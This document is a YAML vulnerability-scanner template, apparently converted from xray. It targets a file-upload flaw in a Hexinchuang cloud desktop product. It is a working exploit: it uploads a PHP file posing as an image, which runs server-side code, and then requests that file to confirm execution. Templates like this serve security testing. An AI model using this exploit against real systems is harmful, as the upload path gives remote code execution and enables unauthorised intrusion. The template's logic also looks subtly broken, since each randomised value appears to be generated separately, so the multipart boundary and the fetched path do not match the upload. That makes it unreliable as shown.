id: poc-yaml-hexinchuang-cloud-desktop-file-upload

info:
  name: poc-yaml-hexinchuang-cloud-desktop-file-upload
  author: Aurora
  severity: high
  tags: xray-converted,fileupload,ct-474074
  reference:
    - https://github.com/YinWC/2021hvv_vul/blob/master/0408/%E5%92%8C%E4%BF%A1%E5%88%9B%E5%A4%A9%E4%BA%91%E6%A1%8C%E9%9D%A2%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C.md

http:
  - raw:
      - |
        POST /Upload/upload_file.php?l={{rand_base(8)}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----{{rand_base(8)}}

        ------{{rand_base(8)}}
        Content-Disposition: form-data; name="file"; filename="{{rand_base(8)}}.php"
        Content-Type: image/avif
        
        <?php echo md5({{rand_int(1000, 9999)}});unlink(__FILE__);?>
        ------{{rand_base(8)}}--

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
  - raw:
      - |
        GET /Upload/{{rand_base(8)}}/{{rand_base(8)}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200